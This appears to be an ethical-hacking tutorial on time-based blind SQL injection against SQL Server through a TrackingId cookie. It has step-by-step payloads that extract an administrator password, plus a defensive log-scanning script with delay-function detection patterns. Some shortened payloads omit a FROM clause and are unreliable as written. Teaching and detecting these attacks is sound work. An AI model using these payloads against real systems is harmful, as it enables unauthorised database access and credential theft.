Objective
Demonstrate how to exploit a blind SQL injection vulnerability when:
- The application does not return any visible output.
- Error messages are suppressed or handled gracefully.
- No conditional response difference is observed.
In such cases, we can use time-based blind SQL injection, where the attacker forces the database to wait (delay) for a certain amount of time depending on whether an injected condition is TRUE or FALSE.
This delay allows us to infer sensitive data one character at a time, based on how long the HTTP response takes to arrive.
Key Concepts
1. Blind SQL Injection
A type of SQL injection where the attacker cannot see the results of their query. There is no direct output or error message returned from the application.
There are two main types:
- Content-based blind SQLi: Application behavior changes slightly based on the result ("Welcome back" vs nothing).
- Time-based blind SQLi: Application always behaves the same; only the response time reveals the result.
2. Time-Based Detection
When the application suppresses all output and errors, we force the database to pause using built-in functions like:
| DBMS | Delay Function | 
|---|---|
| SQL Server | WAITFOR DELAY '0:0:10' | 
| MySQL | SLEEP(10) or BENCHMARK() | 
| PostgreSQL | pg_sleep(10) | 
| Oracle | DBMS_LOCK.SLEEP(10) | 
If the HTTP response is delayed, it indicates that the injected condition was TRUE.
Step-by-Step Attack Walkthrough
Let's assume we're targeting a vulnerable web application that uses a TrackingId cookie to perform a SQL query in the backend.
We suspect SQL injection is possible but:
- No output is returned
- No visible error messages
- We observe no change in content or behavior
So we switch to time-based blind SQL injection.
Step 1: Confirm Vulnerability Using Time Delay
Test if we can trigger a delay with a known TRUE and FALSE condition.
Payload (TRUE condition):
'; IF (1=1) WAITFOR DELAY '0:0:10'--
Payload (FALSE condition):
'; IF (1=2) WAITFOR DELAY '0:0:10'--
Result:
- First request is delayed by ~10 seconds, so the condition is TRUE
- Second request returns immediately, so the condition is FALSE
Confirmed: We can control execution timing via SQL conditions.
Step 2: Test for Table Existence
Now test if the users table exists:
Payload:
'; IF (SELECT COUNT(*) FROM users) > 0 WAITFOR DELAY '0:0:10'--
Result:
- If there is a 10-second delay, the users table exists
Step 3: Check for Administrator User
Next, check if the username 'administrator' exists in the users table.
Payload:
'; IF (SELECT COUNT(*) FROM users WHERE username = 'administrator') > 0 WAITFOR DELAY '0:0:10'--
Result:
- A delay occurs, so the administrator user exists
Step 4: Extract Password Character by Character
Now extract the password one character at a time using SUBSTRING() and ASCII() comparisons.
Payload (Check if the first letter is > 'm'):
'; IF (SELECT COUNT(*) FROM users WHERE username = 'administrator' AND ASCII(SUBSTRING(password, 1, 1)) > 109) = 1 WAITFOR DELAY '0:0:10'--
Repeat this process for each character position, using a binary search over the ASCII values of the candidate characters (a-z, A-Z, 0-9) to determine the exact character with far fewer requests than trying each value in turn.
You can automate this using:
- Burp Intruder
- Python script with requests + timing analysis
Example: Binary Search Through Characters
Suppose we want to find the first character of the password:
- Try 'a' to 'z' using timing differences.
- Use binary search logic to narrow down faster.
Example payloads:
'; IF (ASCII(SUBSTRING(password,1,1)) > 97) WAITFOR DELAY '0:0:10'--  # Is it after 'a'?
'; IF (ASCII(SUBSTRING(password,1,1)) > 100) WAITFOR DELAY '0:0:10'-- # Is it after 'd'?
Eventually, you'll pinpoint the correct character.
Summary of Key Queries
| Purpose | Payload | 
|---|---|
| Confirm SQLi | ' | 
| Trigger delay (TRUE) | '; IF (1=1) WAITFOR DELAY '0:0:10'-- | 
| Trigger delay (FALSE) | '; IF (1=2) WAITFOR DELAY '0:0:10'-- | 
| Check table existence | '; IF (SELECT COUNT(*) FROM users) > 0 WAITFOR DELAY '0:0:10'-- | 
| Check admin user | '; IF (SELECT COUNT(*) FROM users WHERE username='administrator') > 0 WAITFOR DELAY '0:0:10'-- | 
| Extract password char | '; IF (ASCII(SUBSTRING(password,1,1)) > 100) WAITFOR DELAY '0:0:10'-- | 
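A defender-side counterpart to the queries above: a small Python script, added here and not part of the original post, that scans access-log lines for the delay functions listed in the DBMS table and for responses that took roughly as long as the injected delay. The log format, client addresses and TrackingId values are constructed for the example; the signature regex only covers the plain spellings shown on this page.

```python
import re
from urllib.parse import unquote

# Delay functions from the DBMS table on this page (plain spellings only).
DELAY_PATTERNS = re.compile(
    r"WAITFOR\s+DELAY|\bSLEEP\s*\(|\bBENCHMARK\s*\(|\bpg_sleep\s*\(|DBMS_LOCK\.SLEEP",
    re.IGNORECASE,
)

# Constructed sample log (not real traffic): client, method, path,
# TrackingId cookie value (URL-encoded), and response time in milliseconds.
SAMPLE_LOG = """\
203.0.113.7 GET /product?id=3 cookie=TrackingId=xyz123 ms=42
203.0.113.7 GET /product?id=3 cookie=TrackingId=xyz123';%20IF%20(1=1)%20WAITFOR%20DELAY%20'0:0:10'-- ms=10041
203.0.113.7 GET /product?id=3 cookie=TrackingId=xyz123';%20IF%20(1=2)%20WAITFOR%20DELAY%20'0:0:10'-- ms=39
198.51.100.9 GET /product?id=5 cookie=TrackingId=abc789 ms=51
203.0.113.7 GET /product?id=3 cookie=TrackingId=xyz123'%20AND%20(SELECT%20pg_sleep(10))-- ms=10020
"""

LINE_RE = re.compile(
    r"^(?P<ip>\S+) \S+ \S+ cookie=TrackingId=(?P<tid>\S+) ms=(?P<ms>\d+)$"
)


def parse_line(line):
    """Return a dict with ip, decoded TrackingId and response ms, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "tid": unquote(m["tid"]), "ms": int(m["ms"])}


def classify(entry, delay_ms=9000):
    """Reasons an entry looks like time-based SQLi. A FALSE-branch probe still
    carries the delay function even though it returns fast, so both signals
    are reported independently."""
    reasons = []
    if DELAY_PATTERNS.search(entry["tid"]):
        reasons.append("delay-function")
    if entry["ms"] >= delay_ms:
        reasons.append("slow-response")
    return reasons


def find_suspicious(log_text):
    """Scan the log and return (ip, decoded cookie, ms, reasons) per hit."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry["ip"], entry["tid"], entry["ms"], reasons))
    return hits
```

Because extraction works one character at a time, a single client producing many such hits in a row is the pattern to alert on, not one isolated slow request.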
Takeaways
- When no output or error is available, time-based SQL injection is your best bet.
- Use built-in delay functions specific to the database engine.
- Use binary search to speed up password extraction.
- Automate testing with Burp Intruder or custom scripts.
- Even without seeing output, you can infer secrets via timing side channels.
Final Notes
Time-based SQL injection is a powerful technique for exploiting silent vulnerabilities. While slower than other methods, it works even when:
- Output is completely suppressed.
- Errors are handled gracefully.
- The application shows no visible change.
With patience and automation, attackers can extract full databases, including usernames, passwords, and API keys, just by measuring how long it takes for a server to respond.
Final Words
Great job understanding and applying time-based blind SQL injection! You've now mastered one of the most stealthy and effective techniques in ethical hacking.
Happy hacking!